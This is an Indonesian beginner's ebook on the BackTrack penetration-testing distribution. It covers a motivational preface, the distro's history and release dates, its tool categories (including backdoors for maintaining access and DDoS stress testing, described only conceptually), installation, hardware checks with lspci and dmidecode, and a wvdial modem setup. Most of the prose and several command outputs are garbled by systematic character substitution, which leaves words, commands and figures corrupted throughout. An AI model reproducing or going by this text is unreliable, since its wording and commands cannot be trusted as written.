-ata A#&a. Se/a$ai c,#t,h> &i &a%a- ke%as. A#&a -e-i%iki te-a# "a#$ je#i.s. Ti/a
ti/a &,se# -e-/erika# s,a% "a#$ s.%it> Sa#$ D,se# -e#$ataka# /ah<a ti&ak a&a
sat. 2.# -ahasis<a#"a "a#$ -a-2. -e#"e%esaika# s,a% terse/.t. Te-a# A#&a
"a#$ je#i.s &a# seri#$ -aj. ke &e2a# 2e#asara# &e#$a# a2a "a#$ &ikataka# &,se#.
Je#i.s %a#$s.#$ -e#c,/a &,se# &a# a2a "a#$ &ikataka# &,se# /e#ar /e#ar terja&i.
A#&a "a#$ ter-as.k> ,ra#$ "a#$ /iasa saja &i ke%as. Me%ihat> -e#&e#$ar &a#
-erasaka# te-a# A#&a "ait. si Je#i.s> A#&a -e-i%iki NBe%ie!e S"ste-N. Dia saja
ti&ak /isa> /a$ai-a#a &e#$a# sa"aK Jika kita /e%.- -e#c,/a &i /.k. i#i -aka hasi%
"a#$ kita &a2atka# ha#"a sat. "ait. $a$a%. Ber/e&a
Sa%ah sat. s,%.si .#t.k +akt,r ke&.a a&a%ah saat#"a A#&a /er$a.% &e#$a# ,ra#$
,ra#$ s.kses kh.s.s#"a &i /i&a#$ Backtrack.
Jika anda bergaul dengan orang-orang yang suka galau tentu Anda
memiliki "alau !elie"e System"
Ki#i saat#"a kita -.%ai 2eka &e#$a# Be%ie!e S"ste- "a#$ -e#$ha-/at &iri A#&a
.#t.k /isa -e#$.asai Backtrack. Aka# a&a 2erta#"aa# -e#$e#ai Backtrack. *#i
/.ka#%ah 2erta#"aa# -e#$e#ai arti secara te,ri teta2i 2erta#"aa# /er&asarka#
2e#$a%a-a# hi&.2 A#&a @Be%ie!e S"ste-B. C,#t,h#"a> Li#.1 a&a%ah siste- ,2erasi
"a#$ ti&ak +a-i%iar &e#$a# sa"a.
Sa"a a&a%ah ...............
Backtrack a&a%ah ...........................................................................................................
Jika A#&a -e#ja<a/ 2erta#"aa# &i atas &e#$a# 2,siti+> sa"a .ca2ka# se%a-at>
kare#a se/e#tar %a$i #a$a &i &a%a- &iri A#&a aka# ter/a#$.#. Ba$i "a#$ /e%.-
2,siti!e. Kita aka# /e%ajar /ersa-asa-a. Ba#"ak seka%i -et,&e .#t.k
-e#$ha#c.rka# -e#ta% /%,ck @ke"aki#a# #e$ati+B. Di &a%a- 2e-/ahasa# ka%i i#i>
kita aka# /e%ajar cara#"a -e-2e#$ar.hi a%a- /a<ah sa&ar &e#$a# k,#&isi sa&ar.
S"arat .#t.k -e%ak.ka# ha% i#i a&a%ah k,#&isi N2.#cak e-,siN.
4.#cak e-,si a&a%ah -,-e# &i-a#a a#&a -e%.a2ka# e-,si 2,siti+ &a# -e#er,/,s
a%a- /a<ah sa&ar a#&a secara sa&ar. Mari kita 2raktek /ersa-asa-a. Kita aka#
-e#.%is ke-/a%i NBe%ie!e S"ste-N -e#$e#ai A#&a> Li#.1> Backtrack &a# Hacki#$.
Be%ie!e s"ste- &isi#i har.s -.&ah &ii#$at. Jika se/e%.-#"a #e$ati+> saat#"a a#&a
-er./ah -e#ja&i 2,siti!e. Jika s.&ah 2,siti!e> /.at%ah -e#ja&i %e/ih 2,siti!e.
Sa"a a&a%ah ...............................................................................................................
Backtrack a&a%ah ......................................................................................................
.
Ba$ai-a#a cara -e#$$.#aka# -et,&e i#iK
1. Kataka# &e#$a# 2e#.h se-a#$at Q Sia2a sa"aK Backtrack a&a%ahK
'. Kataka# ses.ai &e#$a# isi &i atas> 2.#cak e-,si> 2e#.h se-a#$at
0. Lak.ka# ter.s -e#er.s hi#$$a a#&a ha+a% &a# -e#e-.ka# i#t,#asi "a#$ c,c,k
K.#ci s.kses -e%ak.ka# Thera2" i#i a&a%ah> 4.#cak e-,si> 2e#.h se-a#$at>
2e#$.%a#$a# &a# -e#e-.ka# i#t,#asi &a# /ahasa t./.h "a#$ c,c,k.Sa"a i#$i#
.ca2ka# se%a-at ke2a&a a#&a kare#a a#&a te%ah -e#$.2$ra&e /e%ie!e s"ste- a#&a
-e#ja&i %e/ih &ahs"at. A#&a se2erti /a"i "a#$ ter%ahir "a#$ ti&ak -e#$e#a% kata
#e$ati+ sehi#$$a -a-2. -e%ak.ka# se$a%a ha%. Dari ti&ak /isa /erja%a# hi#$$a /isa
/erja%a#. Da# a#&a &ari ti&ak /isa /acktrack hi#$$a -e#$.asai Backtrack
9. en4nda
Se/e%.-#"a sa"a 2er#ah /erja#ji ke2a&a A#&a .#t.k -e#je%aska# %e/ih &etai%
-e#$e#ai se-a#$at. Ba#"ak ,ra#$ "a#$ ti&ak -e#$a-/i% ti#&aka# kare#a -e#.#&a.
Mereka "a#$ -e#.#&a seri#$ka%i kare#a ti&ak -e-i%iki ke2e#ti#$a# ata. ti&ak
&i&esak. Mereka "a#$ /e%ajar Backtrack teta2i &i -asa &e2a# ti&ak a&a
h./.#$a##"a &e#$a# BacktrackK Ke-.#$ki#a# /esar -ereka -e#.#&a. Bisa j.$a
kare#a ti&ak &i&esak> i#i seri#$ terja&i kare#a <akt. "a#$ %,#$$ar ata. ti&ak a&a#"a
2e#eta2a# t.j.a# @/atasB. Kita /isa -e%ihat -ereka "a#$ -e-i%iki tar$et> te#t. aka#
/erj.a#$ .#t.k se%esai se/e%.- tar$et.
Mari kita -e#je%aska# ' +akt,r ta&iR
$. Tidak 5erasa 6entin1
Mari%ah kita /er2ikir ja#$ka 2a#ja#$. A2akah Backtrack /erh./.#$a# &e#$a# -asa
&e2a# A#&aK Jika /e%.- a&a> A#&a -e-/.t.hka# 2r,ses .#t.k -e#ja&ika#
Backtrack /a$ia# &ari -asa &e2a# A#&a. Sa-a ha%#"a &e#$a# A#&a "a#$ /ar.
/er2acara#> a<a%#"a A#&a ha#"a /er2ikir .#t.k 2acara# teta2i &e#$a# kek.ata#
kasih sa"a#$> 2asa#$a# A#&a sa#$at 2e#ti#$ &i /a$ia# hi&.2 A#&a kare#a A#&a
-e-i%iki tar$et .#t.k -e#ja&ika# 2asa#$a# hi&.2. Di &a%a- /.k. i#i> a#&a
-e%ak.ka# I4DKTJ ke Backtrack hi#$$a Backtrack -e#ja&i 2asa#$a# hi&.2 A#&a
"a#$ sa#$at /er2e#$ar.h .#t.k -asa &e2a# A#&a.
%.Tidak didesak
Se/e%.- sa"a -e-/erika# 2e#ce$ah &a# ,/at. Sa"a i#$i# /erta#"a ke2a&a
a#&a.Me#$a2a a#&a i#$i# /e%ajar BacktrackK..............

Jika a#&a -e#$.k.r &ari ja<a/a# A#&a. A2akah it. a&a%ah ja<a/a# ,ra#$ "a#$
se-a#$at .#t.k Be%ajar /acktrackK
Ta2i seri#$ka%i ,ra#$ "a#$ se-a#$at -asih -e#.#&a. Cara .#t.k -e#$,/ati a&a%ah
-e#$$.#aka# siste- re<ar& a#& 2.#ish-e#t. Saat A#&a -e%ak.ka# ses.at..
Berika# ha&iah .#t.k &iri se#&iri> &a# /erika# kese#$saraa# jika ti&ak -e%ak.ka#
ha% i#i. *%-. i#i seri#$ka%i sa"a %ak.ka# ke2a&a c%ie#t "a#$ i#$i# %a#$si#$. Mereka
"a#$ i#$i# %a#$si#$. Jika i-2ia# terca2ai -aka -ereka /,%eh -e-a#jaka# &iri ke
sa%,#.
Ba$ai-a#a jika $a$a%K Maka sa"a /erika# sa#ksi "ait. -aka# k,t,ra#.
Na$a "a#$ terta#a- &a%a- &iri a#&a ti&ak aka# /a#$.# &e#$a# se#&iri ta#2a a#&a
-e%ak.ka# a2a2.#> /.k. "a#$ a#&a /e%i ka%i i#i ti&ak %e/ih &ari sek.-2.%a# kertas
sa-2ah jika a#&a ti&ak -e%ak.ka# ti#&aka# a2a2.#> jika a#&a Acti,# &a# /er.saha
-aka ta#2a /.k. i#i 2.# a#&a aka# /erhasi% -e#ja&i IMasterJ. Ja#$a# ja&ika# /.k.
i#i se/a$ai 2at,ka#> ja&ika# i#i se/a$ai 2e-a#&. &a# 2e#,%,#$ a#&a> kare#a i%-.
Backtrack "a#$ aka# &isa-2aika# aka# ter.s /erke-/a#$> /e%ajar%ah &ari -a#a2.#
a#&a /isa /e%ajar> c,/a%ah &i-a#a2.# a#&a /isa -e#c,/a.
4erja%a#a# -e#$e%i%i#$i &.#ia &ia<a%i &e#$a# %a#$kah 2erta-a> Christ,2er
C,%,-/.s ti&ak aka# -e#e-.ka# /e#.a a-erika ta#2a %a#$kah 2erta-a#"a> ja#$a#
-a%. jika a#&a se/e%.-#"a ti&ak -e-i%iki /asic a2aa2a te#ta#$ &.#ia Backtrack>
kare#a %a#$kah 2erta-a "a#$ a#&a a-/i% aka# -e#.#t.# a#&a -e#.j. %a#$kah
%a#$kah se%a#j.t#"a> a#&a te%ah -e#$a-/i% %a#$kah Dahs"at &e#$a# -e-/e%i &a#
-e-/aca /.k. i#i> Se%a-at O a#&a s.&ah -e#$a-/i% %a#$kah 2erta-a
4a&a /a/ se%a#j.t#"a aka# -e-/ahas &ari a<a% te#ta#$ /acktrack> 2e%ajari%ah
&e#$a# /aik &a# a-/i%ah ti#&aka# &ari setia2 2e%ajara# "a#$ a#&a &a2atka#> Se%a-at
Me-/aca.
#o Action $ #othing %appen
Action $ Miracle %appen
"A" I
INTRODUCTION OF "ACKTRACK
Oleh : Ares The Hope Buster
$. ENGENA' "ACKTRACK DAN SE0ARAHN:A
$.$ Se;ara2 "acktrack
Backtrack &i/.at ,%eh ati A2aroni "a#$ -er.2aka#
k,#s.%ta# sek.riti &ari *srae% &a# a< osser. Ja&i
-er.2aka# k,%a/,rasi k,-.#itas. Backtrack se#&iri
-er.2aka# -er$er &ari w2a1 "a#$ -er.2aka# sa%ah sat.
&istr, Li#.1 "a#$ &i$.#aka# .#t.k tes kea-a#a# "a#$
asa% &ari <ha1 se#&iri &ari K#,22i1.
Ketika K#,22i1 -e#ca2i !ersi 0.; -aka &i#a-aka#
&e#$a# <ha1. =ha1 &a2at &i$.#aka# .#t.k -e%ak.ka#
tes sek.riti &ari /er/a$ai jari#$a# &i -a#a saja.
a< osser -er.2aka# a.&it,r sec.rit" c,%%ecti,# "a#$ -e#$kh.s.ska# &iri#"a
.#t.k -e%ak.ka# 2e#etrasi kea-a#a# &i Li#.1. Ga/.#$a# &ari a.&it,r &a# =ha1 i#i
se#&iri -e#$hasi%ka# 0;; t,,% "a#$ &i$.#aka# .#t.k testi#$ sec.rit" jari#$a#.
A.&it,r sec.rit" c,%%ecti,# j.$a ter&a2at 2a&a k#,22i1.
$.% (ersi+=ersi 7an1 te/a2 di ri/is
Tanggal Rilis
26 05 2006 backtrack pertama kali yang merupakan
versi non beta 1.0
13 10 2006 backtrack versi 2 beta pertama untuk
publik di rilis
19 11 2006 backtrack versi 2 beta kedua untuk
publik di rilis
06 03 200! backtrack versi 2 "inal dirilis
1! 12 200! backtrack versi 3 beta pertama dirilis
19 03 200# backtrack versi 3 "inal dirilis
11 01 2010 backtrack versi $ "inal dirilis
10 05 2011 backtrack versi 5 "inal dirilis
1# 0# 2011 backtrack versi 5 R1 dirilis
%. SU"+SU" TOO'S PADA "ACKTRACK
Backtrack a&a%ah 2e#etrasi t,,%s "a#$ ter&iri &ari /a#"ak t,,%sAa2%ikasi. S./s./
t,,%s 2a&a -e#. #a$a /acktrack a&a%ah /ej.-%ah %e/ih &ari 9>> t,,%s. (#t.k
-e#a-2i%ka##"a a#&a ti#$$a% har.s -e-as.ka# 2eri#tah
r,,tS/tQT &2k$ E%ist
Setia2 t,,%s &i k%asi+ikasika# 2a&a /e/era2a ke%,-2,k &e#$a# +.#$si -asi#$-asi#$
t,,%s.
"acktrack ( 5en4 na1a ? dra1on 5en4s @
%.$. In3or5ation 1at2erin1
*#+,r-ati,# $atheri#$ a&a%ah s./ t,,%s "a#$ /erisi t,,%s E t,,%s "a#$ &i $.#aka#
ata. /erh./.#$a# &e#$a# -e#$.-2.%ka# i#+,r-asi @ information gathering B.
Se,ra#$ attacker aka# ter%e/ih &ah.%. -e#$.-2.%ka# i#+,r-asii#+,r-asi tar$et#"a
se/e%.- &ia aka# -e%ak.ka# e12%,itasi &a# e12%,rasi. i#+,r-asi "a#$ &i k.-2.%ka#
/iasa#"a i#+,r-asi ip, port, protokol, dns, record. C,#t,h t,,%s "a#$ seri#$ &i
$.#aka# &isi#i a&a%ah nmap, hping, unicorn , openvas > &%%.
%.%. (4/nerabi/it7 asses5ent
V.%#era/i%it" Asses-e#t @(AB &iterje-ahka# &a%a- /ahasa *#&,#esia -e#ja&i
Lpengukuran kelemahan seranganM> s.at. kata "a#$ /iki# kita /er2ikir 2a#ja#$ a2a
-aks.&#"a.V.%#era/i%it" -e-a#$ ti&ak -e-i%iki terje-aha# "a#$ 2as &a%a- /ahasa
*#&,#esia> &ari ka-.s )1+,r& arti !.%#era/%e a&a%ahQ exposed to being attacked or
harmed, either physically or emotionally. Se/e#ar#"a 2a%i#$ -.&ah a&a%ah
-e#erje-ahka# !.%#era/i%it" se/a$ai ke/e5a2an atas seran1an dari /4ar.
%.9. E<6/oitation Too/s
E12%,itati,# t,,%s a&a%ah s./ t,,%s -e#. "a#$ /erisi t,,%st,,%s "a#$ &i 2akai .#t.k
-e%ak.ka# ti#&aka# explotasi sete%ah taha2 2e#$.-2.%a# informasi &a# VA se%esai.
Masih /a#"ak s./s./ t,,%s %ai##"a "a#$ ter&a2at 2a&a e12%,tati,# t,,%s i#i.
Se-,$a #a#ti 2a&a re!isi /erik.t#"a sa"a aka# -e#c,/a -e-a2arka# sat. 2ersat.
s./ &ari s./ t,,%s i#i.
%.). Pri=i/a1e Esca/ation
4ri!i%e$e Esca%ati,# a&a%ah ti#&aka# mengeksploitasi bug> Kesa%aha# &esi$# ata.
2e#$a<asa# k,#+i$.rasi &a%a- s.at. siste- ,2erasi ata. a2%ikasi 2era#$kat %.#ak
.#t.k -e#&a2atka# akses ke s.-/er &a"a terti#$$i "a#$ /iasa#"a &i%i#&.#$i &ari
a2%ikasi ata. 2e#$$.#a. Sehi#$$a PE &a2at -e%ak.ka# 2er./aha#2er./aha# ata.
ti#&aka#ti#&aka# %ai##"a "a#$ -e-i%iki ,t,ritas terte#t..
%.*. aintainin1 Access
Biasa#"a sete%ah -e%ak.ka# e12%,tasi &a# 4E > attacker aka# -e#i#$$a%ka# 2i#t.
-as.k @ /ack&,,rs B "a#$ #a#ti#"a aka# -e-/.ka s.at. kese-2ata# ata. 2e%.a#$
.#t.k ke-/a%i -e-as.ki siste- terse/.t ka2a# saja. S./ t,,%s i#i /erisi t,,%s E t,,%s
.#t.k -e#ci2taka# /ack&,,r/ack&,,r terte#t..
%... Re=erse En1ineerin1
Re!erse e#$i#eeri#$ a&a%ah s.at. 2r,ses "a#$ /ert.j.a# .#t.k -e#e-.ka# 2ri#si2
2ri#si2 tek#,%,$i 2era#$kat terte#t. > ,/jek> ata. siste- -e%a%.i a#a%isis str.kt.r>
+.#$si> &a# ,2erasi. Re!erse e#$i#eeri#$ a#a%isis har&<are .#t.k ke.#t.#$a#
k,-ersia% ata. -i%iter.
%.&. RFID Too/s
K.-2.%a# t,,%st,,%s "a#$ &i $.#aka# .#t.k ke2er%.a# RFID. Berik.t 2e#$ertia#
RFID "a#$ sa"a k.ti2 &ari <iki2e&ia RFID @/ahasa *#$$risQ Ra&i, 8reU.e#c"
*&e#ti+icati,#B ata. *&e#ti+ikasi 8rek.e#si Ra&i, a&a%ah se/.ah -et,&e i&e#ti+ikasi
&e#$a# -e#$$.#aka# sara#a "a#$ &ise/.t %a/e% R8*D ata. tra#s2,#&er .#t.k
-e#"i-2a# &a# -e#$a-/i% &ata jarak ja.h. La/e% ata. kart. RFID a&a%ah se/.ah
/e#&a "a#$ /isa &i2asa#$ ata. &i-as.kka# &i &a%a- se/.ah 2r,&.k> he<a# /ahka#
-a#.sia &e#$a# t.j.a# .#t.k i&e#ti+ikasi -e#$$.#aka# $e%,-/a#$ ra&i,. La/e%
RFID ter&iri atas mikrochip silikon &a# a#te#a. La/e% "a#$ 2asi+ ti&ak -e-/.t.hka#
s.-/er te#a$a> se&a#$ka# %a/e% "a#$ akti+ -e-/.t.hka# s.-/er te#a$a .#t.k &a2at
/er+.#$si.
%.A. Stress Testin1
K.-2.%a# t,,%s "a#$ /erh./.#$a# &e#$a# aksi &&,s "ait. ti#&aka# +%,,&i#$ "a#$
&i&ata#$ka# &ari k.-2.%a# h,sts. @ %e/ih &ari sat. h,sts B
%.B. Forensics
K.-2.%a# t,,%s "a#$ /erh./.#$a# &e#$a# foresics> /aik &i$ita% forensics . 8,re#sic
se#&iri &i $.#aka# .#t.k -e%ak.ka# 2e#"e%i&ika#2e#"e%i&ika# 2a&a kas.skas.s
cybercrime. 8,re#sic &i%ak.ka# &e#$a# /er/a$ai t,,%s .#t.k -e#$a#a%isa +i%e >
s,+t<are> har&<are &e#$a# t.j.a# terte#t..
%.$>. Re6ortin1 Too/s
Le/ih ke2a&a t,,%s &a# a2%ikasi .#t.k 2e#$$.#aa# &,k.-e#tasi &a# %a2,ra# aksi
ata. ke$iata#ke$iata#
%.$$. Ser=ices
K.-2.%a# t,,%st,,%s .#t.k -e#ja%a#ka# %a"a#a#%a"a#a# serta &ae-,#&ae-,#
terte#t. 2a&a /acktrack
%.$%. isce//aneo4s
T,,%s "a#$ &i $.#aka# .#t.k /er-aca--aca- ke/.t.ha# %ai##"a.
9. PE"UATAN ISO FI'E DAN INSTA'ASI "ACKTRACK
9.$ Down/oad iso 3i/e backtrack.
D,<#%,a& ter%e/ih &ah.%. +i%e is, /acktrack ses.ai ke/.t.ha# &i sit.s res-i
&e!e%,2er. Sit.s terse/.t /era%a-at &i <<<./acktrack%i#.1.,r$ 2i%ih%ah +i%e is,
ses.ai ke/.t.ha#. 8i%e is, "a#$ terse&ia 2a&a saat -,&.%e i#i sa"a /.at a&a%ah Q
gnome 3 ! "# bit , $D% 3 ! "# bit, AR&. Ar- &i $.#aka# .#t.k -e%ak.ka#
2e#$is#ta%a# &i 5obi/e de=ice.
9.% e5b4at iso backtrack.
Se/e%.- -e-/.at +i%e is, /acktrack > ti&ak sta/i%#"a k,#eksi > !ir.s 2a&a siste-
,2erasi aka# -e-/.at +i%e terse/.t c,rr.2t. Cek !a%i&asi se/e%.- -e%ak.ka#
2e#$i#sta%a# &e#$a# -&5 checks.-. 4a&a siste- ,2erasi /in4< 2e#$eceka# !a%i&asi
&a2at &i%ak.ka# &e#$a# cara
C,#t,h 5d*s45 c,--a#& %
root&bt%md5sum auditor20060502ip'2100.iso
cdec$b9!5c1001ddc12!a16a32ed1dd! auditor200605
02ip'2100.iso
Se&a#$ka# 2a&a siste- ,2erasi <i#&,<s a#&a &a2at -e#$$.#aka# t,,%s $ratis
se2erti 2as2ca/c "a#$ /isa &i &a2atka# 2a&a a%a-at
htt2QAA<<<.s%a!as,+t.c,-Ahashca%cAi#&e1.ht-. *#+,r-asi -&5 &a2at a#&a te-.ka#
2a&a ha%a-a# &,<#%,a& /acktrack terse/.t. Sete%ah 2e#$eceka# se%esai &a# !a%i& >
/.at%ah +i%e is, /acktrack &e#$a# -e#$$.#aka# 4netbotin. La#$kah%a#$kah
2e#$is#ta%a# %i!e .s/ a&a%ah se/a$ai /erik.t.
ini545 ka6asitas US" ada/a2 % G"
$. 8,r-at (SB &ri!e ke +,r-at FAT9%
%. D,<#%,a& (#et/,,ti# &i 2tt6CDD4netbootin.so4rce3or1e.netD
9. Ja%a#ka# (#et/,,ti# ke-.&ia# 2i%ih &iski-a$e -as.ka# +i%e is, /acktrack
). 2i%ih 2,sisi (SB &ri!e ke-.&ia# k%ik IOKJ .#t.k -e-/.at Ibootable
'ack(rack )*' driveJ
Se&a#$ka# .#t.k -e-/.at c& is, kita /isa -e#$$.#aka# +asi%itas /.r#i#$ i-a$e
se2erti nero "a#$ /erja%a# 2a&a siste- ,2erasi windows
9.9 Insta/asi backtrack ste6 b7 ste6
4a&a /a$ia# i#i aka# &i/ahas cara i#sta%% BackTrack 5 2a&a har&&isk> -e#$a2a
BackTrack 5. Kare#a -e#.r.t sa"a !ersi i#i %e/ih sta/%e &ari !ersi 5 R1
Ya#$ &i/.t.hka#Q
DVD BackTrack 5 @*#c.%e&B
K,-2.ter 2e#ti.- 0 Ata. %e/ih.
Kesa&ara# &a# Kesa/ara#
Ce-i%a# @&ikare#aka# a$ak %a-aB
4erta-ata-a at.r /,,t ,r&er .#t.k DVD.
$. B,,ti#$ !ia DVD BackTarck 5
ambar *eleksi boot
%. T.#$$. sa-2ai /,,ti#$ s%esai. Saat -.#c.% she%% ketika# Estart<F .#t.k
-e-.%ai G(* -,&e
ambar +,I mode
9. K%ik &.a ka%i 2a&a ic,# IInstall 'ack(rackJ
ambar Install 'ack(rack
). 4e-i%iha# /ahasa "a#$ &i$.#aka#> &e+a.%t ke Bahasa *#$ris ke-.&ia#
I8,r<ar&J
ambar &'( -emilihan 'ahasa
*. 4e-i%iha# H,#a <akt.. K%ik &i &aerah sekitar -aka &ia a.t,-atis
-e#e#t.ka# H,#a <akt. &a# k,ta.
ambar .ona /aktu dan $ota
.. La",.t Ke"/,ar&> &e+a.%t (SA ke-.&ia I8,r<ar&J
ambar $eyboard ,ayout
&. 4e-/.ata# 2artisi> 2i%ih IA&!e#ce&J ke-.&ia# I8,r<ar&J
ambar Disk *pace
A. 4i%ih INe< 4artiti,# Ta/%eJ @C,#t,h har&isk k,s,#$B. Bi%a i#$i# &.a%/,,t
&e#$a# )S %ai#> k%ik 2a&a 2artisi "a#$ k,s,#$ ata. &i./ah .#t.k &.a%/,,t.
Ke-.&ia# IA&&J %a#j.t &e#$a# J8,r<ar&J
ambar &') &enambah -artisi
B. Taha2 /erik.t a&a%ah 2e-/.ata# s0ap ata. memory cadangan1 S<a2 &iisi
' ka%i %i2at &ari .k.ra# -e-,r" @RAMB. )2si USE AS &i$a#ti -e#ja&i
swa6 area. )K
ambar &'* *0ap Area
$>. 4e-/.ata# 2artisi> /esar s.saika# &e#$a# ke/.t.ha#> USE AS 2i%ih E<t>
ke-.&ia# $a#ti o4nt Point -e#ja&i A@S%ashB> %a%. )K. Jika S<a2 &a#
4artisi s.&ah &i/.at> La#j.t &e#$a# k%ik I8,r<ar&J
ambar &'+, -embuatan -artisi
$$. Jika se-.a sia2 .#t.k -e#$i#sta%% BackTrack 5. K%ik INSTA''.
ambar &'++ Siap untuk -nstall
$%. 4r,ses i#sta%%asi> /.t.h <akt. %a-a. Saat ::P it. "a#$ sa#$at %a-a
@B.ka# Err,rB. Bi%a se%esai -aka aka# Ire/,,tJ ata. IrestartJ.
ambar &'+& -roses Installasi
$9. Se%esai re/,,t &a# /,,ti#$ se%esai. Mas.ka# (ser#a-e De+a.%tQ r,,t
&e#$a# 2ass<,r&Q t,,r. Ke-.&ia# start1.
$). BackTrack 5 S.&ah terta#a- &i&a%a- har&&isk. Maka# %a#$kah%a#$kah
2e-/e%ajara# kita &i-.%aiO
ambar &'+. (ampak seperti di a0al1
). DE(ICE DAN HARD!ARE TROU"'E SHOUTING
Be/era2a je#is device 0ireless &a# visual graph adapter 2 vga 3 ti&ak s.2,rt
terha&a2 /acktrack &e#$a# ker#e% ter/ar. seka%i2.#. Kita &a2at -e#$ecek#"a
&e#$a# -e#$$.#aka# 2eri#tah /s6ci
root&bt()*%lspci
00%00.0 R+, memory% n-idia .orporation ,./61 ,emory .ontroller
0rev a11
00%01.0 23+ bridge% n-idia .orporation ,./61 4/. 5ridge 0rev
a21
00%01.1 3,5us% n-idia .orporation ,./61 3,5us 0rev a21
0rev a21
00%02.0 635 .ontroller% n-idia .orporation ,./61 635 .ontroller
0rev a31
0rev a31
00%0$.0 /.2 bridge% n-idia .orporation ,./61 /.2 bridge 0rev
a11
00%05.0 +udio device% n-idia .orporation ,./61 7ig8 9e"inition
+udio 0rev a21
00%06.0 29: inter"ace% n-idia .orporation ,./61 29: 0rev a21
00%0!.0 5ridge% n-idia .orporation ,./61 :t8ernet 0rev a21
00%0#.0 29: inter"ace% n-idia .orporation ,./61 3+T+ .ontroller
0rev a21
00%0#.1 29: inter"ace% n-idia .orporation ,./61 3+T+ .ontroller
0rev a21
00%09.0 /.2 bridge% n-idia .orporation ,./61 /.2 :;press bridge
0rev a21
00%0b.0 /.2 bridge% n-idia .orporation ,./61 /.2 :;press bridge
0rev a21
00%0c.0 /.2 bridge% n-idia .orporation ,./61 /.2 :;press bridge
0rev a21
00%1#.0 7ost bridge% +dvanced ,icro 9evices <+,9= >10 <?pteron@
+t8lon6$@ 3empron= 7yperTransport .on"iguration
+t8lon6$@ 3empron= +ddress ,ap
+t8lon6$@ 3empron= 9R+, .ontroller
+t8lon6$@ 3empron= ,iscellaneous .ontrol
00%1#.$ 7ost bridge% +dvanced ,icro 9evices <+,9= >10 <?pteron@
+t8lon6$@ 3empron= 4ink .ontrol
02%00.0 -A+ compatible controller% n-idia .orporation A9#
<AeBorce #$00 A3= 0rev a11
G.#aka# +.#$si V1re6V &a# Vd5idecodeV .#t.k 2e-eriksaa# %e/ih s2esi+ik
Pe5eriksaan et2ernet
root&bt()C9esktop*%lspci D grep :t8ernet
00%0!.0 5ridge% n-idia .orporation ,./61 :t8ernet 0rev a21
Pe5eriksaan =1a ? =is4a/ 1ra62 ada6ter @
root&bt()C9esktop*%lspci D grep -A+
02%00.0 -A+ compatible controller% n-idia .orporation A9#
<AeBorce #$00 A3= 0rev a11
Pe5eriksaan 4sb
Eee&eic8el()C9esktop*%lspci D grep 635
0rev a31
0rev a31
Pe5eriksaan e5or7 RA
root&bt()C9esktop*%lspci D grep R+,
0rev a11
0rev a21
+t8lon6$@ 3empron= 9R+, .ontroller
Pen1ecekan Siste5 ot2erboard
root&bt()C9esktop*%dmidecode t baseboard
F dmidecode 2.9
3,52?3 2.6 present.
7andle 0;0002@ 9,2 type 2@ 15 bytes
5ase 5oard 2n"ormation
,anu"acturer% :.3
/roduct Game% AeBorce6100/,,2
-ersion% 3.0
3erial Gumber%
+sset Tag%
Beatures%
5oard is a 8osting board
5oard is replaceable
4ocation 2n .8assis%
.8assis 7andle% 0;0003
Type% ,ot8erboard
.ontained ?bHect 7andles% 0
Pen1ecekan siste5 bios
root@bt{~/Desktop}:dmidecode | head -15
# dmidecode 2.9
SMBIOS 2.6 present.
50 structures occupying 2049 bytes.
Table at 0x0009F400.
Handle 0x0000, DMI type 0, 24 bytes
BIOS Information
Vendor: American Megatrends Inc.
Version: 080015
Release Date: 09/08/2009
Address: 0xF0000
Runtime Size: 64 kB
ROM Size: 1024 kB
Characteristics:
ISA is supported
(#t.k tr,./%esh,.ti#$ ata. +i1 /.$ ker#e% terha&a2 /er/a$ai je#is har&<are terte#t.
a#&a &a2at -e%ihat 2a&a &,k.-e#tasi +,r.- kita &i
htt2QAA+,r.-.i#&,#esia#/acktrack.,r.i&
*. PER' 8 P:THON DAN "ASH
Backtrack a&a%ah siste- ,2erasi %i#.1 "a#$ -e#&.k.#$ /er/a$ai /ahasa
2e-,$ra-a# se2erti 2er%> 2"th,# &a# /ash. 4e#$$.#aa# +i%e 2er% 2a&a /acktrack
&e#$a# s"#ta1
4ERL
6er/ G na533a 3i/e H.6/
4e#$$.#aa# +i%e 2"th,# 2a&a /acktrack /isa -e#$$.#aka# s"#ta1
2"th,#
67t2on G na5a 3i/e H.67
4e#$$.#aa# +i%e /ash 2a&a /acktrack /isa -e#$$.#aka# s"#ta1
BASH
s2 G na5a 3i/e H.s2
ata. kita /isa -e-/erika# hak esek.si &e#$a# cara
c25od I< G na5a 3i/e H
.. PENGGUNAAN ODE US"
(#t.k -e%ak.ka# konektivitas -,&e- US" 2a&a /acktrack &a2at -e#$$.#aka#
/e/era2a t,,%s /a<aa# &a# /e/era2a t,,%s ta-/aha#.
..$. !=dia/ G internet dea/er H
<!i&ia% secara de3a4/t s.&ah teri#sta% 2a&a /acktrack. =!&ia% &i 2a#$$i% &e#$a#
syntax
root&bt()*% 'vdial I
=!&ia% a&a%ah t,,%s "a#$ /er/asis c/i @ command line interface B .Me#a-/ahka#
!aria/%e ? ha#"a a$ar <!i&a% &a2at /er-ai# &a%a- back1ro4nd.
=!&ia% &a2at &i k,#+i$.rasi "a#$ /er%,kasi secara &e+a.%t &i
CetcC'vdial.con"
C,#t,h 2e#$$.#aa# <!&ia%
C,#t,h &i si#i kita aka# -e#$$.#aka# -,&e- te/ko53/as2 &e#$a# /er/asis kart.
te/ko5se/
<9ialer telkom"las8=
2nit1 J +TK
2nit2 J +TL0 -1 :1 30J0 I.1 I92 MB.4+33J0
2nit3 J +TM.A9.?GTJ1@ NO2/NO@ NOinternetNO
,odem Type J 635 ,odem
239G J 0
Ge' ///9 J yes
/8one J P99F
,odem J CdevCtty6350
6sername J ///
/ass'ord J ///
5aud J 3600000
+uto 9G3 J 1
ke-/a%i %a$i ke ter-i#a%> ketik <!i&ia% .#t.k -e-eriksa ke/era&aa# -,&e-
WvModem<*1>: Cannot get information for serial port.
ttyUSB0<*1>: ATQ0 V1 E1 OK
ttyUSB0<*1>: ATQ0 V1 E1 Z OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 OK
ttyUSB0<*1>: Modem Identifier: ATI Manufacturer:
QUALCOMM INCORPORATED
ttyUSB0<*1>: Speed 9600: AT OK
ttyUSB0<*1>: Max speed is 9600; that should be safe.
ttyUSB1<*1>: ATQ0 V1 E1 failed with 2400 baud, next
try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 failed with 9600 baud, next
try: 9600 baud
